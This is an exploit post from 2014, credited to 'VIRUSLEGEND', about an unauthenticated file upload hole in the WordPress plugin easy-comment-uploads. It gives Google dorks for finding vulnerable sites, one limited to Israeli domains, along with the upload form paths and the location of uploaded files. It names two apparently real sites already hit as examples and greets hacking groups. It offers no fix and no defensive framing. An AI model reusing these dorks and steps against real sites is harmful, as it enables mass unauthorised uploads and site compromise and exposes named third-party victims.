facebook facebook twitter rss

WordPress easy-comment-uploads File Upload Vulnerability

Author: VIRUSLEGEND , Published: 29-10-2014
############################################################################

# Title : WordPress : easy-comment-uploads Upload Vulnerability



# Author : VIRUSLEGEND



# Date : 10/28/2014



# blogger : http://hackersnationuk.blogspot.com



# Email: viruslegend@rescueteam.com



# Vendor : www.wordpress.org



# Google Dork : inurl:/wp-content/plugins/easy-comment-uploads/

inurl:/wp-content/plugins/easy-comment-uploads/ site:il



# Tested on : Windows 7 , windows 8, linux

############################################################################



=== > Exploit :

http://TARGET/wp-content/plugins/easy-comment-uploads/upload-form.php

this link to see the allowed files to upload :

http://TARGET/wp-content/plugins/easy-comment-uploads/upload.php

upload a file .txt or any allowed file then you can access your file from here >>>


Uploaded File Access ==== > http://TARGET/wp-content/uploads/2014/10/uploadedfile.txt/


Examples :



1 - http://www.lesagseg.co.il/wp-content/uploads/2014/10/viruslegend.txt



2- http://www.mukorom.info/wp-content/uploads/2014/10/viruslegend.jpg





#################################################################







# Greeting : Anonymous Arab,Anonghost,Jordanian Electronic Army,hackersnationuk,all the hackers in the world.







#################################################################

Like us on Facebook :